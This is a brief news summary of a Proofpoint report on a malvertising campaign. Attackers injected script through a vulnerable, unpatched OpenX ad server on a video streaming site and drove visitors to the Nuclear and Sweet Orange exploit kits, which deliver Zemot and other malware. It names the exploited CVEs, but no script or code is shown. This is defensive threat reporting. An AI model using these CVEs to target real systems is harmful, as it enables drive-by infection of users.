In a new blog post from Proofpoint, their discovery a new malvertising campaign, which is targeting a popular media streaming site, is discussed.
Key take outs for the post include:
Proofpoint researchers have detected that a prominent live video streaming platform was victim of a malvertising campaign and has been actively serving malware to visitors. This is a result of an ongoing mass injection campaign against OpenX, an open-source ad server, and provides an instructive example in the operation of an injected JavaScript.
As we described in our recent post on a major malvertising campaign, exploits served by infected sites will silently infect visitors with malware, without the victim noticing or having to “click on” or “agree to” anything: simply visiting the website can result in an infection for vulnerable systems. The site was detected delivering Zemot malware, but other malware known to be delivered by the active exploit kits include Cidox, a vicious master boot record (MBR) rootkit, and the Zeus banking Trojan (aka Zbot).
It appears that the site is running OpenX 2.8.9, which is not the latest version. It is very important to note that even the latest version, OpenX 2.8.11, is known to be vulnerable to SQL injection exploits since December 2013 (CVE-2013-7149). The vulnerability is considered an “old 0-day” because OpenX never released a patch to fix this vulnerability in this or any other version of OpenX.
This case highlights the current malvertising threat created by the large number of unsupported OpenX installations in the wild, which we analyzed in a recent post. In the case of this site, the attackers have been able to modify the HTML code for the banner ad that is displayed on every page, and have infected it with the following script:
The injected script forces visiting browsers to "pull in" malicious script from some malicious domain. A visitor is ultimately fed with exploits from either the Nuclear or the Sweet Orange exploit kit. We’ve observed the involved Sweet Orange EK installations to support the following exploits: CVE-2013-2551 (IE), CVE-2013-2424(IE), CVE-2013-2471 (Java), CVE-2014-0322 (IE), and CVE-2013-2460 (Java).